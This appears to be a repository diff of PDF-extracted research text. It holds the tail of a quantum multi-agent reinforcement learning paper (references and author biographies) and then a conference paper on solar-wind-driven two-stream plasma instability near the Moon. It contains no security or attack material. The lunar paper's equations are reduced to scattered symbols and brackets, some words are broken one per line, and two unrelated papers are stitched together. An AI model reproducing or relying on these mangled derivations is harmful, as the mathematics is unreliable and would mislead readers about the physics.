+ [24] Y. Kwak, W. J. Yun, S. Jung, and J. Kim, “Quantum neural networks:
1562
+ Concepts, applications, and challenges,” in Proc. IEEE Int’l Conf. on
1563
+ Ubiquitous and Future Networks (ICUFN), August 2021.
1564
+ [25] S. Y.-C. Chen, C.-H. H. Yang, J. Qi, P.-Y. Chen, X. Ma, and H.-S.
1565
+ Goan, “Variational quantum circuits for deep reinforcement learning,”
1566
+ IEEE Access, vol. 8, pp. 141 007–141 024, 2020.
1567
+ [26] Y. Kwak, W. J. Yun, S. Jung, J.-K. Kim, and J. Kim, “Introduction
1568
+ to quantum reinforcement learning: Theory and PennyLane-based im-
1569
+ plementation,” in Proc. IEEE Int’l Conf. on ICT Convergence (ICTC),
1570
+ October 2021.
1571
+ [27] G. Carleo, I. Cirac, K. Cranmer, L. Daudet, M. Schuld, N. Tishby,
1572
+ L. Vogt-Maranto, and L. Zdeborov´a, “Machine learning and the physical
1573
+ sciences,” Reviews of Modern Physics, vol. 91, no. 4, p. 045002, 2019.
1574
+ [28] P. Sunehag, G. Lever, A. Gruslys, W. M. Czarnecki, V. Zambaldi,
1575
+ M. Jaderberg, M. Lanctot, N. Sonnerat, J. Z. Leibo, K. Tuyls et al.,
1576
+ “Value-decomposition networks for cooperative multi-agent learning,”
1577
+ CoRR, June 2017.
1578
+ [29] P. W. Shor, “Scheme for reducing decoherence in quantum computer
1579
+ memory,” Physical Review A, vol. 52, no. 4, p. R2493, 1995.
1580
+ [30] W. J. Yun, Y. Kwak, J. P. Kim, H. Cho, S. Jung, J. Park, and J. Kim,
1581
+ “Quantum multi-agent reinforcement learning via variational quantum
1582
+ circuit design,” arXiv preprint arXiv:2203.10443, 2022.
1583
+ [31] O. Lockwood and M. Si, “Reinforcement learning with quantum varia-
1584
+ tional circuit,” in Proc. AAAI Conference on Artificial Intelligence and
1585
+ Interactive Digital Entertainment (AIIDE), October 2020.
1586
+ [32] O. Simeone, “An introduction to quantum machine learning for engi-
1587
+ neers,” CoRR, vol. abs/2205.09510, June 2022.
1588
+ [33] P. W. Shor, “Algorithms for quantum computation: Discrete logarithms
1589
+ and factoring,” in Proc. IEEE Foundations of Computer Science (FOCS),
1590
+ Santa Fe, NM, USA, November 1994, pp. 124–134.
1591
+ [34] L. K. Grover, “A fast quantum mechanical algorithm for database
1592
+ search,” in Proc. of ACM Symposium on Theory of Computing (STOC),
1593
+ ser. STOC ’96, New York, NY, USA, 1996, p. 212–219.
1594
+ [35] A. Bolu and
1595
+ Korc¸ak, “Path planning for multiple mobile robots in
1596
+ smart warehouse,” in Proc. IEEE International Conference on Control,
1597
+ Mechatronics and Automation (ICCMA), 2019, pp. 144–150.
1598
+ [36] B. Villalonga, D. Lyakh, S. Boixo, H. Neven, T. S. Humble, R. Biswas,
1599
+ E. G. Rieffel, A. Ho, and S. Mandr`a, “Establishing the quantum
1600
+ supremacy frontier with a 281 pflop/s simulation,” Quantum Science
1601
+ and Technology, vol. 5, no. 3, p. 034003, 2020.
1602
+ [37] X. Bai, Y. Fang, W. Lin, L. Wang, and B.-F. Ju, “Saliency-based
1603
+ defect detection in industrial images by using phase spectrum,” IEEE
1604
+ Transactions on Industrial Informatics, vol. 10, no. 4, pp. 2135–2145,
1605
+ 2014.
1606
+ [38] J.-Y. Lee, T.-W. Kim, and H. J. Pahk, “Robust defect detection method
1607
+ for a non-periodic tft-lcd pad area,” International Journal of Precision
1608
+ Engineering and Manufacturing, vol. 18, no. 8, pp. 1093–1102, 2017.
1609
+ [39] Y. Xia, C. Luo, Y. Zhou, and L. Jia, “A hybrid method of frequency
1610
+ and spatial domain techniques for TFT-LCD circuits defect detection,”
1611
+ IEEE Transactions on Semiconductor Manufacturing, pp. 1–1, 2022.
1612
+ [40] T. Xue, R. Li, M. Tokgo, J. Ri, and G. Han, “Trajectory planning for
1613
+ autonomous mobile robot using a hybrid improved qpso algorithm,” Soft
1614
+ Computing, vol. 21, no. 9, pp. 2421–2437, 2017.
1615
+ [41] S. Jung, W. J. Yun, M. Shin, J. Kim, and J.-H. Kim, “Orchestrated
1616
+ scheduling and multi-agent deep reinforcement learning for cloud-
1617
+ assisted multi-UAV charging systems,” IEEE Transactions on Vehicular
1618
+ Technology, vol. 70, no. 6, pp. 5362–5377, June 2021.
1619
+ [42] F. A. Oliehoek and C. Amato, A Concise Introduction to Decentralized
1620
+ POMDPs.
1621
+ Springer Publishing Company, Incorporated, 2016.
1622
+ [43] G.
1623
+ E.
1624
+ Crooks,
1625
+ “Gradients
1626
+ of
1627
+ parameterized
1628
+ quantum
1629
+ gates
1630
+ us-
1631
+ ing the parameter-shift rule and gate decomposition,” CoRR, vol.
1632
+ abs/1905.13311, May 2019.
1633
+ [44] D. Company, “Dell e series e2311h monitor,” DELL Inc., 2022.
1634
+ [Online]. Available: http://www1.la.dell.com/content/products/productd
1635
+ etails.aspx/monitor-dell-e2311h?c=sr&l=en&s=corp&∼tab=specstab
1636
+ [45] M. Schenk, E. F. Combarro, M. Grossi, V. Kain, K. S. B. Li, and
1637
+ S. Popa, Mircea-Marian aFnd Vallecorsa, “Hybrid actor-critic algorithm
1638
+ for quantum reinforcement learning at cern beam lines,” CoRR, vol.
1639
+ abs/2209.11044, September 2022.
1640
+ [46] P. Sunehag, G. Lever, A. Gruslys, W. M. Czarnecki, V. Zambaldi,
1641
+ M. Jaderberg, M. Lanctot, N. Sonnerat, J. Z. Leibo, K. Tuyls et al.,
1642
+ “Value-decomposition networks for cooperative multi-agent learning,”
1643
+ CoRR, vol. abs/1706.05296, June 2017.
1644
+
1645
+ 11
1646
+ [47] O. Lockwood and M. Si, “Playing Atari with hybrid quantum-classical
1647
+ reinforcement learning,” in Proc. NeurIPS 2020 Workshop on Pre-
1648
+ registration in Machine Learning, December 2021, pp. 285–301.
1649
+ [48] A. Abbas, D. Sutter, C. Zoufal, A. Lucchi, A. Figalli, and S. Woerner,
1650
+ “The power of quantum neural networks,” Nature Computational Sci-
1651
+ ence, vol. 1, no. 6, pp. 403–409, 2021.
1652
+ [49] T. Rashid, M. Samvelyan, C. Schroeder, G. Farquhar, J. Foerster,
1653
+ and S. Whiteson, “QMIX: Monotonic value function factorisation for
1654
+ deep multi-agent reinforcement learning,” in Proc. of the International
1655
+ Conference on Machine Learning (ICML), Stockholmsm¨assan, Sweden,
1656
+ July 2018, pp. 4295–4304.
1657
+ Won Joon Yun is currently a Ph.D. student in elec-
1658
+ trical and computer engineering at Korea University,
1659
+ Seoul, Republic of Korea, since March 2021, where
1660
+ he received his B.S. in electrical engineering. He was
1661
+ a visiting researcher at Cipherome Inc., San Jose,
1662
+ CA, USA, during the summer of 2022; and also
1663
+ a visiting researcher at the University of Southern
1664
+ California, Los Angeles, CA, USA during the winter
1665
+ of 2022 for a joint project with Prof. Andreas F.
1666
+ Molisch at the Ming Hsieh Department of Electrical
1667
+ and Computer Engineering, USC Viterbi School of
1668
+ Engineering. His current research interests include machine learning in various
1669
+ fields, quantum machine learning, and multi-agent reinforcement learning.
1670
+ Jae Pyoung Kim is currently an M.S. student in
1671
+ electrical and computer engineering at Korea Uni-
1672
+ versity, Seoul, Republic of Korea, since March 2023,
1673
+ where he received his B.S. in electrical engineering.
1674
+ student in electrical and computer engineering. He
1675
+ is a research engineer at the Artificial Intelligence
1676
+ and Mobility (AIM) Laboratory at Korea University,
1677
+ Seoul, Republic of Korea, from 2021 to 2022. His
1678
+ current research interests include quantum machine
1679
+ learning.
1680
+ Soyi Jung has been an assistant professor at the
1681
+ department of electrical and computer engineering,
1682
+ Ajou University, Suwon, Republic of Korea, since
1683
+ September 2022. She also holds a visiting scholar
1684
+ position at Donald Bren School of Information and
1685
+ Computer Sciences, University of California, Irvine,
1686
+ CA, USA, from 2021 to 2022. She was a research
1687
+ professor at Korea University, Seoul, Republic of
1688
+ Korea, during 2021. She was also a researcher
1689
+ at Korea Testing and Research (KTR) Institute,
1690
+ Gwacheon, Republic of Korea, from 2015 to 2016.
1691
+ She received her B.S., M.S., and Ph.D. degrees in electrical and computer
1692
+ engineering from Ajou University, Suwon, Republic of Korea, in 2013, 2015,
1693
+ and 2021, respectively.
1694
+ Her current research interests include network optimization for autonomous
1695
+ vehicles communications, distributed system analysis, big-data processing
1696
+ platforms, and probabilistic access analysis. She was a recipient of Best Paper
1697
+ Award by KICS (2015), Young Women Researcher Award by WISET and
1698
+ KICS (2015), Bronze Paper Award from IEEE Seoul Section Student Paper
1699
+ Contest (2018), ICT Paper Contest Award by Electronic Times (2019), and
1700
+ IEEE ICOIN Best Paper Award (2021).
1701
+ Jae-Hyun Kim received the B.S., M.S., and Ph.D.
1702
+ degrees, all in computer science and engineering,
1703
+ from Hanyang University, Ansan, Korea, in 1991,
1704
+ 1993, and 1996 respectively. In 1996, he was with
1705
+ the Communication Research Laboratory, Tokyo,
1706
+ Japan, as a Visiting Scholar. From April 1997 to
1707
+ October 1998, he was a postdoctoral fellow at the
1708
+ department of electrical engineering, University of
1709
+ California, Los Angeles. From November 1998 to
1710
+ February 2003, he worked as a member of technical
1711
+ staff in Performance Modeling and QoS manage-
1712
+ ment department, Bell laboratories, Lucent Technologies, Holmdel, NJ. He
1713
+ has been with the department of electrical and computer engineering, Ajou
1714
+ University, Suwon, Korea, as a professor since 2003.
1715
+ He is the Center Chief of Satellite Information Convergence Application
1716
+ Services Research Center (SICAS) sponsored by Institute for Information &
1717
+ Communications Technology Promotion in Korea. He is Chairman of the
1718
+ Smart City Committee of 5G Forum in Korea since 2018. He is vice president
1719
+ of the Korea Institute of Communication and Information Sciences (KICS)
1720
+ from 2022. He is a member of the IEEE, KICS, the Institute of Electronics
1721
+ and Information Engineers (IEIE), and the Korean Institute of Information
1722
+ Scientists and Engineers (KIISE). He was a recipient of IEEE ICOIN Best
1723
+ Paper Award (2021).
1724
+ Joongheon Kim (M’06–SM’18) has been with Ko-
1725
+ rea University, Seoul, Korea, since 2019, where he
1726
+ is currently an associate professor at the School of
1727
+ Electrical Engineering and also an adjunct professor
1728
+ at the Department of Communications Engineering
1729
+ (established/sponsored by Samsung Electronics) and
1730
+ the Department of Semiconductor Engineering (es-
1731
+ tablished/sponsored by SK Hynix). He received the
1732
+ B.S. and M.S. degrees in computer science and
1733
+ engineering from Korea University, Seoul, Korea, in
1734
+ 2004 and 2006; and the Ph.D. degree in computer
1735
+ science from the University of Southern California (USC), Los Angeles, CA,
1736
+ USA, in 2014. Before joining Korea University, he was a research engineer
1737
+ with LG Electronics (Seoul, Korea, 2006–2009), a systems engineer with Intel
1738
+ Corporation (Santa Clara, CA, USA, 2013–2016), and an assistant professor of
1739
+ computer science and engineering with Chung-Ang University (Seoul, Korea,
1740
+ 2016–2019).
1741
+ He serves as an editor for IEEE TRANSACTIONS ON VEHICULAR TECH-
1742
+ NOLOGY, IEEE TRANSACTIONS ON MACHINE LEARNING IN COMMUNI-
1743
+ CATIONS AND NETWORKING, and IEEE COMMUNICATIONS STANDARDS
1744
+ MAGAZINE. He is also a distinguished lecturer for IEEE Communications
1745
+ Society (ComSoc) and IEEE Systems Council.
1746
+ He was a recipient of Annenberg Graduate Fellowship with his Ph.D.
1747
+ admission from USC (2009), Intel Corporation Next Generation and Standards
1748
+ (NGS) Division Recognition Award (2015), IEEE SYSTEMS JOURNAL Best
1749
+ Paper Award (2020), IEEE ComSoc Multimedia Communications Technical
1750
+ Committee (MMTC) Outstanding Young Researcher Award (2020), IEEE
1751
+ ComSoc MMTC Best Journal Paper Award (2021), and Best Special Issue
1752
+ Guest Editor Award by ICT Express (Elsevier) (2022). He also received several
1753
+ awards from IEEE conferences including IEEE ICOIN Best Paper Award
1754
+ (2021), IEEE Vehicular Technology Society (VTS) Seoul Chapter Awards
1755
+ (2019, 2021, and 2022), and IEEE ICTC Best Paper Award (2022).
1756
+
CNE2T4oBgHgl3EQfnwjC/content/tmp_files/load_file.txt ADDED
The diff for this file is too large to render. See raw diff
 
CdFQT4oBgHgl3EQf_DcV/content/tmp_files/2301.13456v1.pdf.txt ADDED
The diff for this file is too large to render. See raw diff
 
CdFQT4oBgHgl3EQf_DcV/content/tmp_files/load_file.txt ADDED
The diff for this file is too large to render. See raw diff
 
HtE0T4oBgHgl3EQfhwE8/content/tmp_files/2301.02435v1.pdf.txt ADDED
@@ -0,0 +1,801 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ 1
2
+
3
+ URSI RCRS 2022, IIT (Indore), India, 1 –4 December, 2022
4
+
5
+
6
+ Streaming Instability Generation in Lunar Plasma Environment
7
+
8
+ Mehul Chakraborty1, Vipin K. Yadav2* and Rajneesh Kumar1
9
+
10
+ 1 Department of Physics, Banaras Hindu University (BHU), Varanasi 221005, India
11
+ 2 Space Physics Laboratory (SPL), Vikram Sarabhai Space Centre (VSSC), Thiruvananthapuram 695022, India
12
+ * Corresponding Author: vipin_ky@vssc.gov.in
13
+
14
+ Abstract
15
+ Plasma instabilities are the non-linear processes occurring
16
+ in plasmas when excess energy gets accumulated in a
17
+ plasma system which is unable to hold it. There are
18
+ almost 60 known plasma instabilities in nature.
19
+ 1. Introduction
20
+ The phenomena of plasma instability takes place in a
21
+ plasma where excess energy is accumulated due to the
22
+ free energy sources. The plasma instabilities are often
23
+ observed in plasma systems residing in space such as the
24
+ Sun, the planetary ionospheres, etc. Earth‟s natural
25
+ satellite Moon has a very thin atmosphere and
26
+ subsequently feeble plasma environment. However, this
27
+ tenuous plasma environment is a place of several non-
28
+ linear plasma phenomena. The solar wind, which strikes
29
+ the lunar surface unhindered due to the absence of global
30
+ lunar magnetic field, is capable of triggering plasma
31
+ instability around the lunar exosphere.
32
+ 2. Plasma Instabilities
33
+ Plasma instability is a physical phenomenon which occurs
34
+ in plasma when an energy build-up takes place there
35
+ taking the plasma system away from the equilibrium. This
36
+ energy build can lead to the plasma particle loss either by
37
+ the generation of plasma waves or the particle beams or
38
+ deformations in the stable plasma structures. It is,
39
+ however, to be noted that the total energy of the system is
40
+ conserved as the instabilities only transfer the free energy
41
+ from one place to another. The free energy in a plasma
42
+ system can be in the form of beam kinetic energy,
43
+ pressure gradients in an effective potential (a light fluid
44
+ supporting a heavier fluid), anisotropies in the velocity
45
+ distribution (particle kinetic energy), energy stored in a
46
+ magnetic field, Spatio-temporal variation in the electric
47
+ field, etc.
48
+ Plasma instabilities are often associated with plasma
49
+ waves supported by the plasma system. The linear phase
50
+ of a plasma instability is initiated by a set of waves which
51
+ are unstable and have an exponential growth rate. Out of
52
+ all the unstable plasma modes, the one having the highest
53
+ growth rate will drive the plasma dynamics and structure
54
+ with its periodicity and location in plasma. This dominant
55
+ mode is defined by the plasma parameters and all other
56
+ unstable modes will generate fluctuations around the
57
+ dominant mode.
58
+ Plasma instabilities can be classified in many ways which
59
+ are as follows [Melzani, 2014]:
60
+ 1. Instabilities with names: Buneman instability, Weibel
61
+ instability, Rayleigh-Taylor (RT) instability, Kelvin-
62
+ Helmholtz (K-H) instability, etc.
63
+ 2. Theory Instabilities: Ideal MHD instability, Resistive
64
+ plasma instability, Kinetic instability, etc.
65
+ 3. Instabilities with physical configuration: Two-stream
66
+ instability, Bump-in-the-tail instability, Filamentation
67
+ instability,
68
+ Kink
69
+ instability,
70
+ Sausage
71
+ instability,
72
+ Ballooning instability, Tearing instability, etc.
73
+ 4. Instabilities with plasma waves: Ion acoustic instability,
74
+ Mirror-mode
75
+ instability,
76
+ Ion
77
+ cyclotron
78
+ instability,
79
+ Electron-heat-flux instability, etc.
80
+ Apart from these there are some other plasma instabilities
81
+ such as resonant and non-resonant instabilities, micro-
82
+ and macro instabilities, etc.
83
+ 3. Instability Analysis in Lunar Plasma
84
+ Environment and Results
85
+ Plasma (Two-stream) instability is analysed in the lunar
86
+ ionosphere where the solar-wind (electron beam) interacts
87
+ with the lunar background plasma containing electrons.
88
+ The ion number density being low in both solar wind as
89
+ well as the lunar ionosphere is neglected here.
90
+ The conditions for the instabilities to generate are
91
+ analyzed from the plasma instability dispersion relation.
92
+ The plasma conditions may not be always suitable for the
93
+ instabilities to evolve as the instability occurrence
94
+ involves the solar wind electron number density, the solar
95
+ wind velocity and the background plasma electron
96
+ number density. Favorable values of these three quantities
97
+ give instabilities at various lunar altitudes. Once the
98
+ instability is generated, an attempt shall be made for the
99
+ estimation of the growth rates of these instabilities which
100
+ in turn will provide information regarding the temporal
101
+ evolution of these instabilities.The dielectric function of
102
+ the beam-plasma system for various values of α [Piel,
103
+ 2010] is shown in Figure 1.
104
+
105
+ U.
106
+ R2
107
+
108
+
109
+ Figure 1: Beam-plasma dielectric function [Piel, 2010].
110
+ For a given value of the plasma and the solar wind (beam)
111
+ parameters, if a kis above the threshold then there will be
112
+ four real solutions. On decreasing, when the kgoes below
113
+ the threshold, the maxima go below zero and the left
114
+ beam mode and right plasma mode merged and can be
115
+ seen in Figure 1.
116
+ The dispersion relation obtained from the analysis of
117
+ beam plasma instability is [Anderson et al., 2001]
118
+
119
+
120
+
121
+
122
+ (
123
+ ⃗⃗⃗
124
+ ⃗⃗⃗⃗⃗⃗⃗ )
125
+ (1)
126
+ ( ⃗ )
127
+
128
+
129
+
130
+
131
+ (
132
+ ⃗⃗⃗
133
+ ⃗⃗⃗⃗⃗⃗⃗ )
134
+ (2)
135
+ The term ⃗⃗⃗
136
+ ⃗⃗⃗⃗⃗⃗ (Doppler shifted frequency) and
137
+
138
+
139
+
140
+
141
+ (3)
142
+ Hence, the dispersion relation becomes
143
+ ( ⃗ )
144
+
145
+
146
+
147
+ ( ) (4)
148
+ The local extremum of this function is obtained
149
+
150
+
151
+
152
+
153
+
154
+
155
+ ( ) (5)
156
+ which becomes
157
+ ( ) (6)
158
+ and gives
159
+ (
160
+
161
+ ⁄ ) [( ) (
162
+
163
+ ⁄ )
164
+
165
+
166
+ (
167
+
168
+ ⁄ ) ( )] (7)
169
+ Case 1: When 1stterm is zero in equation (7)
170
+ (
171
+
172
+ ⁄ )
173
+ Now, ω = ωm when dD/dω = 0
174
+
175
+
176
+ (
177
+
178
+ ⁄ )(8)
179
+ If we put back the expression of alpha then it becomes
180
+
181
+
182
+
183
+
184
+ (
185
+
186
+
187
+
188
+ ⁄ )
189
+ (9)
190
+ This is the local maxima of the function
191
+ Case 2: When 2nd term is zero in above equation
192
+ (
193
+
194
+
195
+
196
+ ⁄ ) (
197
+
198
+ ⁄ )
199
+
200
+ ω is obtained from this quadratic equation as:
201
+
202
+ (
203
+
204
+ ⁄ ) √
205
+
206
+
207
+ (
208
+
209
+
210
+
211
+ ⁄ )
212
+
213
+ Here, the solution is complex unable to give the local
214
+ extremum of the dispersion function. Hence, the 1st case
215
+ real solution is considered to find the local maxima as
216
+ ( ⃗ )
217
+
218
+
219
+
220
+
221
+ ( ) (10)
222
+ Substituting ωmfrom (8), we get
223
+ ( ⃗ )
224
+
225
+
226
+
227
+
228
+
229
+
230
+
231
+
232
+
233
+
234
+ ⁄ (
235
+
236
+ ⁄ ) (11)
237
+ This
238
+ local
239
+ maxima
240
+ determines
241
+ when
242
+ instability
243
+ isgenerated. The maxima depend on the solar wind and
244
+ lunar plasma parameters. Two cases exist here, one where
245
+ Dm > 0 and the other when Dm < 0.
246
+ 3.1 Dm > 0: Real roots
247
+ When Dm > 0, four real roots of the dispersion relation are
248
+ obtained as follows (K = e2/mε0):
249
+ ( ⃗ )
250
+
251
+
252
+
253
+ ( ) = 0 (12)
254
+ which gives
255
+ ( ) (
256
+ )
257
+ ( )
258
+ (13)
259
+ It is evident from this 4th order quartic equation in ω terms
260
+ that there are two singularities at the 2nd and 3rd term. The
261
+ D (ω, k) expression gives singularity at ω = 0 due to the
262
+ space charge of lunar plasma. This is the plasma
263
+ singularity and the modes (normal plasma space charge
264
+ oscillations) around this singularity are also solar wind
265
+ independent. The other singularity is at ω = ωd which
266
+ occurs only when there is a beam (the solar wind) in the
267
+ system irrespective of its strength (the number density and
268
+ velocity).
269
+ The value of beam singularity ωd = kvb is large as vb is of
270
+ the order of 105m/sec (solar wind velocity) and is located
271
+ far away from the origin. The nature of dispersion relation
272
+ remains independent of the singularity ωd = kvb and also
273
+ around the 2nd singularity (one singularity doesn‟t affect
274
+ the nature around another singularity). So, it can be split
275
+ into two parts - one containing the plasma singularity and
276
+ the other containing the beam modes and solved
277
+ separately for the four propagating plasma modes.
278
+ ( ⃗ )
279
+
280
+
281
+
282
+ ( ) = 0
283
+ Near ω ≈ 0, 1 – ωp
284
+ 2/ω2 = 0 giving 2 roots (plasma modes)
285
+
286
+
287
+
288
+ Near ω ≈ ωd
289
+
290
+
291
+ ( )
292
+ which also gives 2 roots which are called beam modes
293
+
294
+
295
+
296
+
297
+ The phase velocities of these two beam modes are
298
+
299
+
300
+
301
+
302
+
303
+
304
+
305
+
306
+
307
+
308
+
309
+ The two beam modes are travelling waves with different
310
+ phase velocities but same group velocities which imply
311
+
312
+ 2
313
+ 3
314
+ dielectric function
315
+ 0
316
+ 2
317
+ --0p0.001
318
+ ..*.,0.01
319
+ -4
320
+ 0g=0.1
321
+ -2
322
+ -1
323
+ 0
324
+ 1
325
+ 2
326
+ 3
327
+ w/wpe3
328
+
329
+ these modes are superposition of many waves. Also, the
330
+ group velocity is equal to the beam velocity which
331
+ suggests that the beam modes are in resonance with the
332
+ beam itself and this can lead to an interaction between the
333
+ modes and the beam.
334
+ The other two plasma modes have both zero phase and
335
+ group velocity, because they are plasma oscillations.
336
+ These modes can become plasma waves if the thermal
337
+ velocities of plasma constituents are taken into account in
338
+ the analysis which is not doing here assuming „cold‟ lunar
339
+ plasma.
340
+ In summary of the propagating modes, two beam (solar
341
+ wind) independent solutions are obtained and these two
342
+ exist due to the lunar plasma and the other two modes
343
+ (travelling waves) comes into existence only when the
344
+ solar wind with high velocities comes and interacts with
345
+ the lunar plasma.
346
+ 3.2 Dm < 0: Complex roots
347
+ The instability will be seen only if Dm ≤ 0 and this
348
+ condition give a threshold for the plasma instability
349
+ generation as
350
+ ( ⃗ ) *
351
+
352
+
353
+
354
+
355
+
356
+
357
+
358
+
359
+
360
+ ⁄ + (
361
+
362
+ ⁄ )
363
+
364
+
365
+ Now,
366
+
367
+
368
+
369
+
370
+ ,
371
+
372
+
373
+ ,
374
+
375
+
376
+ , ⃗
377
+ ⃗⃗⃗⃗⃗⃗
378
+ Substituting these values in the above relation
379
+
380
+
381
+
382
+
383
+ * (
384
+
385
+ )
386
+
387
+
388
+ +
389
+
390
+ [
391
+
392
+ (
393
+ )
394
+
395
+ ⁄ ]
396
+
397
+ The threshold for lunar instability generation is given as
398
+
399
+ * (
400
+ )
401
+
402
+
403
+ +
404
+
405
+ [
406
+
407
+
408
+
409
+
410
+
411
+ (
412
+ )
413
+
414
+
415
+ ]
416
+
417
+
418
+
419
+
420
+
421
+ (14)
422
+ It can be inferred here that for the given values of lunar
423
+ plasma density ne, the solar wind (beam) number density
424
+ nb and solar wind (beam) velocity vb, an instability will
425
+ always get triggered.The lunar plasma number density is
426
+ typically in range 10 cm-3 to 300 cm-3and the solar wind
427
+ parameters are nb = 5 cm-3 and vb = 3.75 × 105m/sec.
428
+ At any given lunar altitude where the value of these
429
+ parameters is known, the propagation constants can be
430
+ obtained for which the instability gets generated. Hence,
431
+ at a specific altitude, multiple instabilities of different k
432
+ can be triggered leading to the generation of multiple
433
+ plasma waves.
434
+ 4. Lunar Plasma Instability: Results
435
+ 4.1 Growth Factor
436
+ When the local maxima of D(ω, k) goes below zero then
437
+ the two roots vanish, and only a single plasma and beam
438
+ mode survive. These two roots are complex conjugates of
439
+ each other (ω = ωr ± ωim) and are obtained by Taylor
440
+ expansion of the dispersion function about the maxima.
441
+ Expanding D(ω,k) about the local maxima ωm as given in
442
+ equation (8)
443
+ ( ) ( ) ( )
444
+ |
445
+
446
+
447
+ ( )
448
+ | (15)
449
+ Now, D(ωm) is given by equation (11), D(ωm) < 0 which
450
+ is the threshold and D′(ωm) = 0 since this point is local
451
+ maxima and also D′′(ωm) < 0. The required dispersion
452
+ relation is D(ω) = 0 which is a quadratic equation in terms
453
+ of (ω − ωm)
454
+ ( ) ( ) ( )
455
+ ( ) ( )
456
+
457
+ ( ) √( ( )) ( ) ( )
458
+ ( )
459
+ = 0
460
+ But D′(ωm) = 0, hence
461
+ √ ( )
462
+ ( )
463
+ Both quantities inside the root are positive, so by Taylor
464
+ expansion, the dispersion relation about the maxima gives
465
+ two complex conjugate roots for ω.The real part of ω is
466
+ given as ωre
467
+
468
+
469
+ (
470
+
471
+ ⁄ )
472
+
473
+
474
+
475
+ (
476
+
477
+
478
+
479
+ ⁄ )
480
+ (16)
481
+ And it gives the phase and group velocities of instability
482
+
483
+
484
+
485
+ (
486
+
487
+ ⁄ )
488
+
489
+
490
+
491
+
492
+ (
493
+
494
+ ⁄ )
495
+
496
+ In these expressions, when α ≪1, there is resonance
497
+ between the instability‟s propagation and the movement
498
+ of the solar wind (beam) making energy transfer from
499
+ electrons to the instability.
500
+ The imaginary part of ω is the growth rate (amplitude
501
+ increase with time)
502
+
503
+ ( )
504
+ ( ) (17)
505
+ Now, the term D′′(ωm) is obtained from equation (5) as
506
+
507
+ *
508
+
509
+
510
+
511
+
512
+ ( ) + (18)
513
+ At ω = ωm, and using equation (8), equation (18) becomes
514
+
515
+
516
+ (
517
+
518
+ ⁄ )
519
+
520
+
521
+
522
+ *
523
+
524
+
525
+
526
+
527
+
528
+ ⁄ + (19)
529
+ D(ωm) and d2D/dω2 are inserted in equation (17) to obtain
530
+
531
+
532
+
533
+ √ (
534
+
535
+ ⁄ )
536
+
537
+
538
+ ⁄ [
539
+
540
+ (
541
+
542
+ ⁄ )
543
+
544
+
545
+
546
+ ⁄ (
547
+
548
+ ⁄ )
549
+
550
+
551
+
552
+
553
+
554
+
555
+
556
+
557
+
558
+ ]
559
+
560
+
561
+
562
+ Dividing the whole by ωp
563
+ 2 and taking ωb
564
+ 2/ωp
565
+ 2 = α, it
566
+ becomes
567
+
568
+
569
+
570
+
571
+ √ (
572
+
573
+ ⁄ )
574
+
575
+ ⁄ (
576
+
577
+
578
+ ) [
579
+
580
+
581
+ (
582
+
583
+
584
+
585
+ ⁄ )
586
+ ]
587
+
588
+
589
+ - (20)
590
+ This expression shows that that the growth factor depends
591
+ on lunar plasma, solar wind (beam) parameters and the k
592
+ of plasma wave. At a given lunar altitude, multiple
593
+
594
+ 4
595
+
596
+ different
597
+ instability
598
+ modes
599
+ can
600
+ exist
601
+ which
602
+ are
603
+ differentiated by their k as per the threshold. Every such
604
+ mode with a specific k will have its growth rate given by
605
+ equation (20).
606
+ The growth factor with k (for different values of ne) is
607
+ plotted in Figure 2 to find the fastest growing mode and to
608
